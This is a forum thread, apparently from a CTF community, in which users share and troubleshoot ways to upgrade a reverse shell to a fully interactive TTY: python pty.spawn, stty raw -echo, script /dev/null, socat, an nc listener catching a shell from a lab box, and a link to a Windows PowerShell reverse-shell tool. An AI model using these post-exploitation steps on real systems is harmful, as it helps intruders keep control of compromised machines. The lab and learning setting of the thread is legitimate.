Obtaining a Fully Interactive Shell

For the sake of variety; instead of doing the python -c ... thing, thus relying on python being available on the box, you could also do:

script /dev/null, this will give you a pty (as tty will tell you), so su and passwd should work. I usually do a bash -i first. Do note that the environment will still need some fixing up (CTRL+z ... etc and export TERM=linux, export HOME=/tmp or something similar).

HTH!

Type your comment> @KeyboardCaper said:

After getting a terminal:

python -c ‘import pty; pty.spawn(“/bin/bash”)’
CTRL-z
bg
stty raw -echo
fg
reset
(In case of unknown terminal type try: linux)

Optional:
export SHELL=/bin/bash
export TERM=xterm-color
export HOME=

Then fix up the rows and columns. Open another terminal
stty -a

Get the rows and columns.

Back on your reverse shell:
stty rows <> columns <>

Rarely does the python part not work… when it doesn’t I simply find a work around or just deal with what I have.

Probably good to note for this that python -c 'import pty;pty.spawn("/bin/bash")' won’t work with any versions of Python3, so specifying python3 -c ... is necessary. Otherwise solid description, you nailed it to a “T”.

I have a curious problem with this kind of shell. I’m working with the Kali KDE distribution with the standard Konsole terminal and /bin/bash/.

I start a reverse shell from another machine.

On my attacking machine I have netcat listening:
nc -l -v -p 80

I get the connection on my host:
listening on [any] 80 …
connect to [10.10.14.2] from craft.htb [10.10.10.110] 40575
/bin/sh: can’t access tty; job control turned off
/opt/app #

I do my routine to elevate the shell:
python -c ‘import pty; pty.spawn(“/bin/bash”)’
CTRL-z
stty raw -echo
fg
reset

I have a fully functional shell BUT I can’t close it. I’ll always have to kill the process. I use exit to leave the shell and end up in a window where I can’t enter any commands. At first I thought that it is a problem with zsh (stty raw -echo; fg kind of) but it is the same in /bin/bash and in Xterm instead of Konsole.

Any Ideas what could go wrong here?

On a side note, what if I don’t have an /bin/bash on the remote machine? Is it possible to get an fully interactive shell?

@timebeyond said:
I have a fully functional shell BUT I can’t close it. I’ll always have to kill the process. I use exit to leave the shell and end up in a window where I can’t enter any commands. At first I thought that it is a problem with zsh (stty raw -echo; fg kind of) but it is the same in /bin/bash and in Xterm instead of Konsole.

I actually had this exact same issue when I was working on networked. I had to kill the process, but I am not sure what went wrong.

On a side note, what if I don’t have an /bin/bash on the remote machine? Is it possible to get an fully interactive shell?

You can use /bin/sh, which is most of the time just a symbolic link to the real active shell.

Thanks for the reassurance that my standard setup has no flaws. Just wanted to be sure that the problem isn’t between the keyboard and the chair.

If you are looking for a way to get fully interactive shell on Windows i just released a c#/powershell reverse shell that implements the pty console. Here the link → GitHub - antonioCoco/ConPtyShell: ConPtyShell - Fully Interactive Reverse Shell for Windows

@splintercode said:
If you are looking for a way to get fully interactive shell on Windows i just released a c#/powershell reverse shell that implements the pty console. Here the link → GitHub - antonioCoco/ConPtyShell: ConPtyShell - Fully Interactive Reverse Shell for Windows

This is absolutely glorious! Just tried it, and suddenly my smb-recon-using-linux-tools-PTSD is cured by the healing light of PS in a PTY :slight_smile:

@splintercode it appears to have some issues deciding which process that listens to the input pipe though. I run the shell from a small PS-stager that IEXs the Invoke-Con*-definition along with an invocation in the same command, and often I get atleast two powershell.exe’s spinning up a process each for every one I try to start :slight_smile:

@scud78 i don’t understand the bugged scenario. If you can open an issue on github (Issues · antonioCoco/ConPtyShell · GitHub) i could troubleshoot the scenario and work for a fix.

@splintercode said:
@scud78 i don’t understand the bugged scenario. If you can open an issue on github (Issues · antonioCoco/ConPtyShell · GitHub) i could troubleshoot the scenario and work for a fix.

Turns out it was the combination of three (or possibly four) nested powershell processes (including yours) with DUPd stdhandles. Not much you can do about that, really :wink:

Hey, my terminal lags like crazy when I’m upgrading my shell to a fully interactive one with python -c 'import … It happens after I type in stty raw -echo and forground the nc session. Anybody has similar issue?

indeed a fun box. a little observation, OSINT and boom. rest is pretty simple.

pm me if need any help.

@MrSHolmes said:

indeed a fun box. a little observation, OSINT and boom. rest is pretty simple.

Did you post this on the wrong thread?

Can anyone tell me why the tty is suddenly really slow after upgrading with this method??

Personally, I find these methods to always be a bit janky and complicated. I usually immediately go for a socat reverse shell to get a proper tty or get a normal shell first only to set the socat shell up. It just feels a lot more stable and doesn’t have as much unexpected behaviour in my opinion. Also it just feels easier ¯_(ツ)_/¯

I saw on another thread where @MinatoTW recommended doing /usr/bin/script -qc /bin/bash /dev/null.

I tried it and it worked like a charm. No long python commands, no throwing the shell into the background and messing with stty.

Saved me from going nuts, windows guy struggle with shells, and zsh on the new KALI took me out of my comfort zone when post exploit. just chain the command
“stty raw -echo; fg”

Hi guys, have a look at this tool.

You get automatically TTY shell and much more.

Type your comment> @hkh4cks said:

I’ve tried the above method few times, but it failed every time. I don’t understand what am I doing wrong…
After doing fg, Enter key is displayed as ^M
Something like this:

$ fg
                           clear^M

Before you start netcat, change the shell to bash by typing bash then try again try. ZSH sucks mate… ??